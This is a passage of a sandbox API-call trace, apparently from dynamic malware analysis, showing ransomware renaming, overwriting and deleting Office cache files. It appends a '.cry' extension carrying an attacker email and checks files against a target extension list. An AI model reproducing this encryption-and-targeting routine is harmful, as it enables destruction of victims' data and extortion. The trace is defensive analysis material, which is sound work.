users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\pptlr.cab.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0036.380] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\pptlr.cab"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\pptlr.cab.id-9c354b42.[decryptoperator@qq.com].cry")) returned 1 [0036.381] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\pptlr.cab.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0036.381] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fc6c | out: lpNewFilePointer=0x0) returned 1 [0036.381] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fc2c | out: lpNewFilePointer=0x0) returned 1 [0036.381] ReadFile (in: hFile=0x190, lpBuffer=0x3950058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2d9fc38, lpOverlapped=0x0 | out: lpBuffer=0x3950058*, lpNumberOfBytesRead=0x2d9fc38*=0x40000, lpOverlapped=0x0) returned 1 [0036.404] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x165e0da, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fc2c | out: lpNewFilePointer=0x0) returned 1 [0036.404] ReadFile (in: hFile=0x190, lpBuffer=0x3990058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2d9fc38, lpOverlapped=0x0 | out: lpBuffer=0x3990058*, lpNumberOfBytesRead=0x2d9fc38*=0x40000, lpOverlapped=0x0) returned 1 [0036.418] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x2d9fc6c | out: lpNewFilePointer=0xffffffff) returned 1 [0036.418] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x42da290, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fc2c | out: lpNewFilePointer=0x0) returned 1 [0036.418] ReadFile (in: hFile=0x190, lpBuffer=0x39d0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2d9fc38, lpOverlapped=0x0 | out: lpBuffer=0x39d0058*, lpNumberOfBytesRead=0x2d9fc38*=0x40000, lpOverlapped=0x0) returned 1 [0036.511] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fec8 | out: lpNewFilePointer=0x0) returned 1 [0036.511] WriteFile (in: hFile=0x190, lpBuffer=0x3950020*, nNumberOfBytesToWrite=0xc00fe, lpNumberOfBytesWritten=0x2d9fcb0, lpOverlapped=0x0 | out: lpBuffer=0x3950020*, lpNumberOfBytesWritten=0x2d9fcb0*=0xc00fe, lpOverlapped=0x0) returned 1 [0036.873] SetEndOfFile (hFile=0x190) returned 1 [0036.873] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x40000) returned 0x3f34090 [0037.004] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fc7c | out: lpNewFilePointer=0x0) returned 1 [0037.004] WriteFile (in: hFile=0x190, lpBuffer=0x3f34090*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2d9fc88, lpOverlapped=0x0 | out: lpBuffer=0x3f34090*, lpNumberOfBytesWritten=0x2d9fc88*=0x40000, lpOverlapped=0x0) returned 1 [0037.005] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x165e0da, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fc7c | out: lpNewFilePointer=0x0) returned 1 [0037.005] WriteFile (in: hFile=0x190, lpBuffer=0x3f34090*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2d9fc88, lpOverlapped=0x0 | out: lpBuffer=0x3f34090*, lpNumberOfBytesWritten=0x2d9fc88*=0x40000, lpOverlapped=0x0) returned 1 [0037.006] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x42da290, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fc7c | out: lpNewFilePointer=0x0) returned 1 [0037.006] WriteFile (in: hFile=0x190, lpBuffer=0x3f34090*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2d9fc88, lpOverlapped=0x0 | out: lpBuffer=0x3f34090*, lpNumberOfBytesWritten=0x2d9fc88*=0x40000, lpOverlapped=0x0) returned 1 [0037.007] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3f34090 | out: hHeap=0x600000) returned 1 [0037.007] CloseHandle (hObject=0x190) returned 1 [0038.798] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x2020) returned 1 [0038.798] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab") returned 72 [0038.798] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab") returned 72 [0038.798] lstrlenW (lpString=".doc") returned 4 [0038.798] lstrcmpiW (lpString1=".doc", lpString2=".cab") returned 1 [0038.798] lstrlenW (lpString=".docx") returned 5 [0038.798] lstrcmpiW (lpString1=".docx", lpString2="R.cab") returned -1 [0038.798] lstrlenW (lpString=".pdf") returned 4 [0038.798] lstrcmpiW (lpString1=".pdf", lpString2=".cab") returned 1 [0038.798] lstrlenW (lpString=".xls") returned 4 [0038.798] lstrcmpiW (lpString1=".xls", lpString2=".cab") returned 1 [0038.798] lstrlenW (lpString=".xlsx") returned 5 [0038.798] lstrcmpiW (lpString1=".xlsx", lpString2="R.cab") returned -1 [0038.798] lstrlenW (lpString=".ppt") returned 4 [0038.798] lstrcmpiW (lpString1=".ppt", lpString2=".cab") returned 1 [0038.798] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab") returned 72 [0038.798] lstrlenW (lpString=".zip") returned 4 [0038.798] lstrcmpiW (lpString1=".zip", lpString2=".cab") returned 1 [0038.798] lstrlenW (lpString=".rar") returned 4 [0038.798] lstrcmpiW (lpString1=".rar", lpString2=".cab") returned 1 [0038.798] lstrlenW (lpString=".bz2") returned 4 [0038.799] lstrcmpiW (lpString1=".bz2", lpString2=".cab") returned -1 [0038.799] lstrlenW (lpString=".7z") returned 3 [0038.799] lstrcmpiW (lpString1=".7z", lpString2="cab") returned -1 [0038.799] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab") returned 72 [0038.799] lstrlenW (lpString=".dbf") returned 4 [0038.799] lstrcmpiW (lpString1=".dbf", lpString2=".cab") returned 1 [0038.799] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab") returned 72 [0038.799] lstrlenW (lpString=".1cd") returned 4 [0038.799] lstrcmpiW (lpString1=".1cd", lpString2=".cab") returned -1 [0038.799] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab") returned 72 [0038.799] lstrlenW (lpString=".jpg") returned 4 [0038.799] lstrcmpiW (lpString1=".jpg", lpString2=".cab") returned 1 [0038.799] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab") returned 72 [0038.799] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab") returned 72 [0038.799] lstrlenW (lpString=".doc") returned 4 [0038.799] lstrcmpiW (lpString1=".doc", lpString2=".cab") returned 1 [0038.799] lstrlenW (lpString=".docx") returned 5 [0038.799] lstrcmpiW (lpString1=".docx", lpString2="R.cab") returned -1 [0038.799] lstrlenW (lpString=".pdf") returned 4 [0038.799] lstrcmpiW (lpString1=".pdf", lpString2=".cab") returned 1 [0038.799] lstrlenW (lpString=".xls") returned 4 [0038.799] lstrcmpiW (lpString1=".xls", lpString2=".cab") returned 1 [0038.799] lstrlenW (lpString=".xlsx") returned 5 [0038.799] lstrcmpiW (lpString1=".xlsx", lpString2="R.cab") returned -1 [0038.799] lstrlenW (lpString=".ppt") returned 4 [0038.799] lstrcmpiW (lpString1=".ppt", lpString2=".cab") returned 1 [0038.799] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab") returned 72 [0038.799] lstrlenW (lpString=".zip") returned 4 [0038.799] lstrcmpiW (lpString1=".zip", lpString2=".cab") returned 1 [0038.799] lstrlenW (lpString=".rar") returned 4 [0038.799] lstrcmpiW (lpString1=".rar", lpString2=".cab") returned 1 [0038.799] lstrlenW (lpString=".bz2") returned 4 [0038.799] lstrcmpiW (lpString1=".bz2", lpString2=".cab") returned -1 [0038.800] lstrlenW (lpString=".7z") returned 3 [0038.800] lstrcmpiW (lpString1=".7z", lpString2="cab") returned -1 [0038.800] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab") returned 72 [0038.800] lstrlenW (lpString=".dbf") returned 4 [0038.800] lstrcmpiW (lpString1=".dbf", lpString2=".cab") returned 1 [0038.800] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab") returned 72 [0038.800] lstrlenW (lpString=".1cd") returned 4 [0038.800] lstrcmpiW (lpString1=".1cd", lpString2=".cab") returned -1 [0038.800] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab") returned 72 [0038.800] lstrlenW (lpString=".jpg") returned 4 [0038.800] lstrcmpiW (lpString1=".jpg", lpString2=".cab") returned 1 [0038.800] lstrcmpiW (lpString1=".cab", lpString2=".cry") returned -1 [0038.800] lstrlenW (lpString="WordLR.cab") returned 10 [0038.800] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\wordlr.cab"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0038.800] GetFileSizeEx (in: hFile=0x190, lpFileSize=0x2d9ff1c | out: lpFileSize=0x2d9ff1c*=43806141) returned 1 [0038.800] CloseHandle (hObject=0x190) returned 1 [0038.800] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\wordlr.cab")) returned 0x2020 [0038.800] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\wordlr.cab.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0038.801] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\wordlr.cab"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\wordlr.cab.id-9c354b42.[decryptoperator@qq.com].cry")) returned 1 [0038.801] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\wordlr.cab.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0038.801] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fc6c | out: lpNewFilePointer=0x0) returned 1 [0038.801] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fc2c | out: lpNewFilePointer=0x0) returned 1 [0038.801] ReadFile (in: hFile=0x190, lpBuffer=0x3950058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2d9fc38, lpOverlapped=0x0 | out: lpBuffer=0x3950058*, lpNumberOfBytesRead=0x2d9fc38*=0x40000, lpOverlapped=0x0) returned 1 [0038.860] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0xdecf3f, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fc2c | out: lpNewFilePointer=0x0) returned 1 [0038.860] ReadFile (in: hFile=0x190, lpBuffer=0x3990058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2d9fc38, lpOverlapped=0x0 | out: lpBuffer=0x3990058*, lpNumberOfBytesRead=0x2d9fc38*=0x40000, lpOverlapped=0x0) returned 1 [0038.901] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x2d9fc6c | out: lpNewFilePointer=0xffffffff) returned 1 [0038.901] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x2986dbd, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fc2c | out: lpNewFilePointer=0x0) returned 1 [0038.901] ReadFile (in: hFile=0x190, lpBuffer=0x39d0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2d9fc38, lpOverlapped=0x0 | out: lpBuffer=0x39d0058*, lpNumberOfBytesRead=0x2d9fc38*=0x40000, lpOverlapped=0x0) returned 1 [0038.926] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fec8 | out: lpNewFilePointer=0x0) returned 1 [0038.926] WriteFile (in: hFile=0x190, lpBuffer=0x3950020*, nNumberOfBytesToWrite=0xc0100, lpNumberOfBytesWritten=0x2d9fcb0, lpOverlapped=0x0 | out: lpBuffer=0x3950020*, lpNumberOfBytesWritten=0x2d9fcb0*=0xc0100, lpOverlapped=0x0) returned 1 [0038.939] SetEndOfFile (hFile=0x190) returned 1 [0038.939] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x40000) returned 0x3f34090 [0038.939] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fc7c | out: lpNewFilePointer=0x0) returned 1 [0038.939] WriteFile (in: hFile=0x190, lpBuffer=0x3f34090*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2d9fc88, lpOverlapped=0x0 | out: lpBuffer=0x3f34090*, lpNumberOfBytesWritten=0x2d9fc88*=0x40000, lpOverlapped=0x0) returned 1 [0038.940] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0xdecf3f, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fc7c | out: lpNewFilePointer=0x0) returned 1 [0038.940] WriteFile (in: hFile=0x190, lpBuffer=0x3f34090*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2d9fc88, lpOverlapped=0x0 | out: lpBuffer=0x3f34090*, lpNumberOfBytesWritten=0x2d9fc88*=0x40000, lpOverlapped=0x0) returned 1 [0038.942] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x2986dbd, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fc7c | out: lpNewFilePointer=0x0) returned 1 [0038.942] WriteFile (in: hFile=0x190, lpBuffer=0x3f34090*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2d9fc88, lpOverlapped=0x0 | out: lpBuffer=0x3f34090*, lpNumberOfBytesWritten=0x2d9fc88*=0x40000, lpOverlapped=0x0) returned 1 [0038.944] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3f34090 | out: hHeap=0x600000) returned 1 [0038.944] CloseHandle (hObject=0x190) returned 1 [0041.355] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x2020) returned 1 [0041.355] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab") returned 73 [0041.355] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab") returned 73 [0041.355] lstrlenW (lpString=".doc") returned 4 [0041.355] lstrcmpiW (lpString1=".doc", lpString2=".cab") returned 1 [0041.355] lstrlenW (lpString=".docx") returned 5 [0041.355] lstrcmpiW (lpString1=".docx", lpString2="R.cab") returned -1 [0041.355] lstrlenW (lpString=".pdf") returned 4 [0041.355] lstrcmpiW (lpString1=".pdf", lpString2=".cab") returned 1 [0041.355] lstrlenW (lpString=".xls") returned 4 [0041.355] lstrcmpiW (lpString1=".xls", lpString2=".cab") returned 1 [0041.355] lstrlenW (lpString=".xlsx") returned 5 [0041.355] lstrcmpiW (lpString1=".xlsx", lpString2="R.cab") returned -1 [0041.355] lstrlenW (lpString=".ppt") returned 4 [0041.355] lstrcmpiW (lpString1=".ppt", lpString2=".cab") returned 1 [0041.355] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab") returned 73 [0041.355] lstrlenW (lpString=".zip") returned 4 [0041.355] lstrcmpiW (lpString1=".zip", lpString2=".cab") returned 1 [0041.355] lstrlenW (lpString=".rar") returned 4 [0041.355] lstrcmpiW (lpString1=".rar", lpString2=".cab") returned 1 [0041.355] lstrlenW (lpString=".bz2") returned 4 [0041.355] lstrcmpiW (lpString1=".bz2", lpString2=".cab") returned -1 [0041.355] lstrlenW (lpString=".7z") returned 3 [0041.355] lstrcmpiW (lpString1=".7z", lpString2="cab") returned -1 [0041.355] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab") returned 73 [0041.355] lstrlenW (lpString=".dbf") returned 4 [0041.355] lstrcmpiW (lpString1=".dbf", lpString2=".cab") returned 1 [0041.355] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab") returned 73 [0041.355] lstrlenW (lpString=".1cd") returned 4 [0041.355] lstrcmpiW (lpString1=".1cd", lpString2=".cab") returned -1 [0041.356] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab") returned 73 [0041.356] lstrlenW (lpString=".jpg") returned 4 [0041.356] lstrcmpiW (lpString1=".jpg", lpString2=".cab") returned 1 [0041.356] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab") returned 73 [0041.356] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab") returned 73 [0041.356] lstrlenW (lpString=".doc") returned 4 [0041.356] lstrcmpiW (lpString1=".doc", lpString2=".cab") returned 1 [0041.356] lstrlenW (lpString=".docx") returned 5 [0041.356] lstrcmpiW (lpString1=".docx", lpString2="R.cab") returned -1 [0041.356] lstrlenW (lpString=".pdf") returned 4 [0041.356] lstrcmpiW (lpString1=".pdf", lpString2=".cab") returned 1 [0041.356] lstrlenW (lpString=".xls") returned 4 [0041.356] lstrcmpiW (lpString1=".xls", lpString2=".cab") returned 1 [0041.356] lstrlenW (lpString=".xlsx") returned 5 [0041.356] lstrcmpiW (lpString1=".xlsx", lpString2="R.cab") returned -1 [0041.356] lstrlenW (lpString=".ppt") returned 4 [0041.356] lstrcmpiW (lpString1=".ppt", lpString2=".cab") returned 1 [0041.356] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab") returned 73 [0041.356] lstrlenW (lpString=".zip") returned 4 [0041.356] lstrcmpiW (lpString1=".zip", lpString2=".cab") returned 1 [0041.356] lstrlenW (lpString=".rar") returned 4 [0041.356] lstrcmpiW (lpString1=".rar", lpString2=".cab") returned 1 [0041.356] lstrlenW (lpString=".bz2") returned 4 [0041.356] lstrcmpiW (lpString1=".bz2", lpString2=".cab") returned -1 [0041.356] lstrlenW (lpString=".7z") returned 3 [0041.356] lstrcmpiW (lpString1=".7z", lpString2="cab") returned -1 [0041.356] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab") returned 73 [0041.356] lstrlenW (lpString=".dbf") returned 4 [0041.356] lstrcmpiW (lpString1=".dbf", lpString2=".cab") returned 1 [0041.356] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab") returned 73 [0041.356] lstrlenW (lpString=".1cd") returned 4 [0041.356] lstrcmpiW (lpString1=".1cd", lpString2=".cab") returned -1 [0041.356] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab") returned 73 [0041.356] lstrlenW (lpString=".jpg") returned 4 [0041.356] lstrcmpiW (lpString1=".jpg", lpString2=".cab") returned 1 [0041.357] lstrcmpiW (lpString1=".msi", lpString2=".cry") returned 1 [0041.357] lstrlenW (lpString="Proof.msi") returned 9 [0041.357] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.msi" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.fr\\proof.msi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1ec [0042.060] GetFileSizeEx (in: hFile=0x1ec, lpFileSize=0x2d9ff1c | out: lpFileSize=0x2d9ff1c*=885760) returned 1 [0042.060] CloseHandle (hObject=0x1ec) returned 1 [0042.060] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.msi" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.fr\\proof.msi")) returned 0x2020 [0042.060] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.msi.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.fr\\proof.msi.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0042.060] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.msi" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.fr\\proof.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1ec [0042.060] SetFilePointerEx (in: hFile=0x1ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fec8 | out: lpNewFilePointer=0x0) returned 1 [0042.060] SetFilePointerEx (in: hFile=0x1ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fec8 | out: lpNewFilePointer=0x0) returned 1 [0042.060] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.msi.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.fr\\proof.msi.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f0 [0042.060] GetLastError () returned 0x0 [0042.060] ReadFile (in: hFile=0x1ec, lpBuffer=0x3950020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d9fed4, lpOverlapped=0x0 | out: lpBuffer=0x3950020*, lpNumberOfBytesRead=0x2d9fed4*=0xd8400, lpOverlapped=0x0) returned 1 [0042.399] WriteFile (in: hFile=0x1f0, lpBuffer=0x3950020*, nNumberOfBytesToWrite=0xd8410, lpNumberOfBytesWritten=0x2d9fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3950020*, lpNumberOfBytesWritten=0x2d9fc9c*=0xd8410, lpOverlapped=0x0) returned 1 [0042.413] ReadFile (in: hFile=0x1ec, lpBuffer=0x3950020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d9fed4, lpOverlapped=0x0 | out: lpBuffer=0x3950020*, lpNumberOfBytesRead=0x2d9fed4*=0x0, lpOverlapped=0x0) returned 1 [0042.413] WriteFile (in: hFile=0x1f0, lpBuffer=0x3950020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x2d9fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3950020*, lpNumberOfBytesWritten=0x2d9fc9c*=0xe6, lpOverlapped=0x0) returned 1 [0042.413] SetEndOfFile (hFile=0x1f0) returned 1 [0042.413] CloseHandle (hObject=0x1f0) returned 1 [0042.419] SetFilePointerEx (in: hFile=0x1ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fec8 | out: lpNewFilePointer=0x0) returned 1 [0042.419] SetEndOfFile (hFile=0x1ec) returned 1 [0042.801] CloseHandle (hObject=0x1ec) returned 1 [0042.801] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.msi.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x2020) returned 1 [0042.801] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.msi" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.fr\\proof.msi")) returned 1 [0042.801] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.msi") returned 81 [0042.801] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.msi") returned 81 [0042.801] lstrlenW (lpString=".doc") returned 4 [0042.801] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1 [0042.801] lstrlenW (lpString=".docx") returned 5 [0042.801] lstrcmpiW (lpString1=".docx", lpString2="f.msi") returned -1 [0042.801] lstrlenW (lpString=".pdf") returned 4 [0042.801] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1 [0042.801] lstrlenW (lpString=".xls") returned 4 [0042.801] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1 [0042.801] lstrlenW (lpString=".xlsx") returned 5 [0042.801] lstrcmpiW (lpString1=".xlsx", lpString2="f.msi") returned -1 [0042.801] lstrlenW (lpString=".ppt") returned 4 [0042.801] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1 [0042.801] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.msi") returned 81 [0042.801] lstrlenW (lpString=".zip") returned 4 [0042.802] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1 [0042.802] lstrlenW (lpString=".rar") returned 4 [0042.802] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1 [0042.802] lstrlenW (lpString=".bz2") returned 4 [0042.802] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1 [0042.802] lstrlenW (lpString=".7z") returned 3 [0042.802] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1 [0042.802] lstrlenW (lpString="C:\\MSOCache\\All 